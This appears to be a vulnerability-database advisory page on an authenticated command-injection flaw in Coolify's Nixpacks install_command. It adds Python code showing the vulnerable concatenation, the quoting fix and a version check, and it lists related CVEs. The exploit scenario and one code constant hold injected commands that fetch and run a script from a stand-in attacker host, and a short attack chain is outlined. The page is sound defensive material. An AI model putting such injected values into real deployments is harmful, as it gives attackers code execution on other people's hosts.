
Coolify EUVD-2026-40224 | CVE-2026-34597 HIGH
OS Command Injection (CWE-78)
Published 2026-06-29 · Vendor (CNA): GitHub_M
CVSS 3.1 base score 8.8

Severity by source

Vendor (GitHub_M), primary: 8.8 HIGH
AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

vuln.today AI: 8.8 HIGH

Network-reachable web UI (AV:N) with simple injection (AC:L) by an authenticated config-capable user (PR:L) yields host RCE with full C/I/A impact.

CVSS 3.1: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVSS 4.0: AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Primary rating from Vendor (GitHub_M).

CVSS Vector (Vendor: GitHub_M)

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low
User Interaction: None
Scope: Unchanged
Confidentiality: High
Integrity: High
Availability: High

Lifecycle Timeline

Patch available: Jun 29, 2026 - 22:02 (EUVD)
Analysis generated: Jun 29, 2026 - 21:15 (vuln.today)

Description (CVE.org)

Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. Prior to 4.0.0-beta.470, a critical Authenticated Host Remote Code Execution (RCE) vulnerability was discovered in Coolify. The flaw resides in the handling of user-defined build parameters for the Nixpacks build pack. Specifically, the install_command provided by a user is directly concatenated into a shell command string that is executed on the deployment host during the building phase. An attacker can leverage this to escape the intended build context and execute arbitrary commands with host-level privileges. This vulnerability is fixed in 4.0.0-beta.470.

Analysis (AI)

Authenticated remote code execution in Coolify (self-hosted PaaS) before 4.0.0-beta.470 lets a low-privileged authenticated user run arbitrary commands on the deployment host. The flaw is an OS command injection in the Nixpacks build pack: the user-supplied install_command build parameter is concatenated unsanitized into a shell command executed during the build phase, allowing escape from the build context to host-level command execution. …


Attack Chain (AI-derived)

Hypothetical attack flow derived from CVE metadata

Access: Authenticate to the Coolify panel with a low-privileged account
Delivery: Create or edit an application that builds with the Nixpacks build pack
Exploit: Inject shell metacharacters into the install_command build parameter
Execution: Trigger the build phase (a deployment)
Persist: The injected command runs on the deployment host; anything beyond that first execution (dropping a backdoor, adding keys) is the attacker's follow-on step and is not described by the advisory
Impact: Host-level RCE achieved

Vulnerability Assessment (AI)

Exploitation: Exploitation requires an authenticated Coolify account (CVSS PR:L) with permission to configure a deployment, and the target application must use the Nixpacks build pack where the attacker can set the install_command build parameter. …

Risk Assessment: The CVSS 3.1 base score is 8.8 (High) with vector AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H, indicating network-reachable, low-complexity exploitation requiring only low privileges and no user interaction, with full confidentiality/integrity/availability impact. …

Exploit Scenario: An attacker with a low-privileged Coolify account (for example, a developer on a shared instance) creates or edits an application configured to build with Nixpacks and sets the install_command to a value containing shell metacharacters such as `; curl attacker.sh | sh`. When the deployment build runs, the injected command executes on the deployment host with the build process's privileges, giving the attacker command execution beyond the intended build sandbox. …

Remediation: Upgrade to the patched release Coolify 4.0.0-beta.470, which contains the fix; see the advisory at https://github.com/coollabsio/coolify/security/advisories/GHSA-9pp4-wcmj-rq73. …
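The bug class the analysis and exploit scenario describe, reduced to a runnable illustration. This is an added example, not Coolify's code: the build string, the `--install-cmd` flag name and the sample records are assumptions standing in for whatever the real build pack does. It shows the vulnerable concatenation, the two hardened forms (quoting the value, or dropping the host shell and passing argv), and a scanner that produces a review list for the install_command audit the recommended action calls for.

```python
"""Command-injection bug class behind CVE-2026-34597, in miniature.

Added illustration, not Coolify's code: a hypothetical build-command
builder that concatenates a user-supplied install_command into a shell
string (the pattern the advisory describes), the two hardened forms, and
a scanner for use when auditing stored install_command values. The
`--install-cmd` flag name is an assumption; all inputs are constructed.
"""
import shlex

# Constructed inputs. The second is the kind of value the exploit scenario describes.
BENIGN_INSTALL = "npm ci --no-audit"
MALICIOUS_INSTALL = "npm ci; curl http://attacker.example/x.sh | sh"

# Constructed export of (application, install_command) pairs to audit.
SAMPLE_RECORDS = [
    ("web", BENIGN_INSTALL),
    ("api", "pip install -r requirements.txt && pip install gunicorn"),
    ("worker", MALICIOUS_INSTALL),
]

SHELL_SEPARATORS = {";", "|", "&", "\n"}


def build_vulnerable(install_command: str) -> str:
    """Bug class: raw concatenation into a string later handed to `sh -c`.

    Anything after an unquoted ';' or '|' runs on the host, not in the build."""
    return "nixpacks build . --install-cmd " + install_command


def build_hardened(install_command: str) -> str:
    """Fix when a shell string is unavoidable: quote the value so the host
    shell sees exactly one argument. Inside the build container the build
    tool still interprets the value as a shell command, which is intended."""
    return "nixpacks build . --install-cmd " + shlex.quote(install_command)


def build_argv(install_command: str) -> list:
    """Preferred fix: no host shell at all. Pass this list to
    subprocess.run(argv, shell=False) (or the Symfony Process equivalent in
    a Laravel app) so no character in the value is special on the host."""
    return ["nixpacks", "build", ".", "--install-cmd", install_command]


def unquoted_breakouts(cmdline: str) -> list:
    """Shell control operators that appear outside single/double quotes.

    Returns [] when the whole user value is contained in one argument."""
    found = []
    quote = None
    i = 0
    while i < len(cmdline):
        c = cmdline[i]
        if quote:
            if c == quote:
                quote = None
            elif c == "\\" and quote == '"':
                i += 1  # escaped character inside double quotes
        elif c in ("'", '"'):
            quote = c
        elif c == "\\":
            i += 1  # escaped character outside quotes
        elif c in SHELL_SEPARATORS:
            found.append(c)
        elif c == "$" and cmdline[i + 1:i + 2] == "(":
            found.append("$(")
        elif c == "`":
            found.append("`")
        i += 1
    return found


def audit_install_commands(records):
    """Review list for an audit: records whose install_command contains
    control operators. Legitimate Nixpacks install commands may chain with
    '&&', so this is a list to inspect, not a block list; the real fix is
    the version upgrade plus quoting/argv on the host side."""
    return [(app, cmd, unquoted_breakouts(cmd))
            for app, cmd in records if unquoted_breakouts(cmd)]


if __name__ == "__main__":
    print("vulnerable :", build_vulnerable(MALICIOUS_INSTALL))
    print("  breakouts:", unquoted_breakouts(build_vulnerable(MALICIOUS_INSTALL)))
    print("hardened   :", build_hardened(MALICIOUS_INSTALL))
    print("  breakouts:", unquoted_breakouts(build_hardened(MALICIOUS_INSTALL)))
    for app, cmd, ops in audit_install_commands(SAMPLE_RECORDS):
        print(f"review {app}: {ops} in {cmd!r}")
```

The distinction worth keeping in mind when reviewing a fix like this: quoting only closes the host-side injection. The same value is still executed as a shell command inside the build image by the build tool, which is what the parameter is for, so `&&` chaining in a legitimate install command is not itself a finding; what matters is that the host shell never parses the value.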

Recommended Action (AI)

Within 24 hours: Audit all Coolify instances to confirm versions and restrict build configuration permissions to administrators only; disable Nixpacks builds if not actively required. …
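A version-triage helper for the audit step above, added here as an example rather than Coolify tooling. The fix versions are the ones stated on this page (4.0.0-beta.470 for this CVE, and beta.445, beta.471 and beta.474 for the related CVEs listed below); the "4.0.0-beta.NNN" string format is the one the advisories use. How you read the running version out of an instance is deployment-specific and is not shown. The ordering pitfall it handles is that a plain "4.0.0" release must sort after every "4.0.0-beta.NNN".

```python
"""Version triage for the Coolify advisories listed on this page.

Added example, not Coolify tooling. Fix versions are taken from the
page; the version format is the advisories' "4.0.0-beta.NNN".
"""
import re

# CVE -> first fixed version, as given on this page.
FIXED_IN = {
    "CVE-2026-34597": "4.0.0-beta.470",
    "CVE-2026-34594": "4.0.0-beta.471",
    "CVE-2026-57498": "4.0.0-beta.474",
    "CVE-2025-64419": "4.0.0-beta.445",
}

_VERSION_RE = re.compile(r"^v?(\d+)\.(\d+)\.(\d+)(?:-beta\.(\d+))?$")


def version_key(version: str) -> tuple:
    """Sort key so that 4.0.0-beta.469 < 4.0.0-beta.470 < 4.0.0.

    A release with no beta suffix sorts after every beta of the same triple;
    a string that does not match the advisories' format is rejected rather
    than silently treated as patched."""
    m = _VERSION_RE.match(version.strip())
    if not m:
        raise ValueError(f"unrecognised Coolify version: {version!r}")
    major, minor, patch, beta = m.groups()
    is_release = 1 if beta is None else 0
    return (int(major), int(minor), int(patch), is_release, int(beta or 0))


def unpatched_cves(running: str) -> list:
    """CVEs from FIXED_IN whose fix version is newer than `running`."""
    key = version_key(running)
    return sorted(cve for cve, fixed in FIXED_IN.items()
                  if key < version_key(fixed))


if __name__ == "__main__":
    # Constructed inventory of instance versions to triage.
    for v in ("4.0.0-beta.440", "4.0.0-beta.469", "4.0.0-beta.470",
              "4.0.0-beta.474", "4.0.0"):
        print(v, "->", unpatched_cves(v) or "no listed CVEs outstanding")
```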


Related Coolify CVEs

CVE-2025-59157 (CRITICAL 9.9, PoC, Jan 05): Coolify, a self-hosted server management platform, allows authenticated users to inject OS commands through the Git Repo…
CVE-2025-66209 (CRITICAL 9.9, PoC, Dec 23): A command injection vulnerability in Coolify's Database Backup functionality allows authenticated users with application…
CVE-2025-64420 (CRITICAL 9.9, PoC, Jan 05): Coolify through v4.0.0-beta.434 exposes the root user's SSH private key to low-privileged team members. Any user with ba…
CVE-2026-57498 (CRITICAL 9.6, PoC, Jun 29): Cross-team authorization bypass in Coolify (open-source self-hosted PaaS) before 4.0.0-beta.474 allows an authenticated,…
CVE-2025-64419 (CRITICAL 9.6, PoC, Jan 05): Coolify before 4.0.0-beta.445 allows command injection through docker-compose.yaml parameters. If a victim creates an ap…
CVE-2026-34594 (HIGH 8.8, PoC, Jun 29): Authenticated OS command injection in Coolify before 4.0.0-beta.471 lets any user holding destination management permiss…
CVE-2025-64424 (HIGH 8.8, PoC, Jan 05): Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. [CVSS 8.8 HIGH]
CVE-2025-59156 (HIGH 8.8, PoC, Jan 05): Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. Prior to version 4.0…
CVE-2025-66211 (HIGH 8.8, PoC, Dec 23): An authenticated command injection vulnerability in Coolify's PostgreSQL initialization script handling allows attackers…
CVE-2025-66210 (HIGH 8.8, PoC, Dec 23): A command injection vulnerability in Coolify's Database Import functionality allows authenticated users with application…
CVE-2025-66213 (HIGH 8.8, PoC, Dec 23): An authenticated command injection vulnerability in Coolify's File Storage Directory Mount Path functionality allows use…
CVE-2025-66212 (HIGH 8.8, PoC, Dec 23): An authenticated command injection vulnerability in Coolify's Dynamic Proxy Configuration Filename handling allows users…
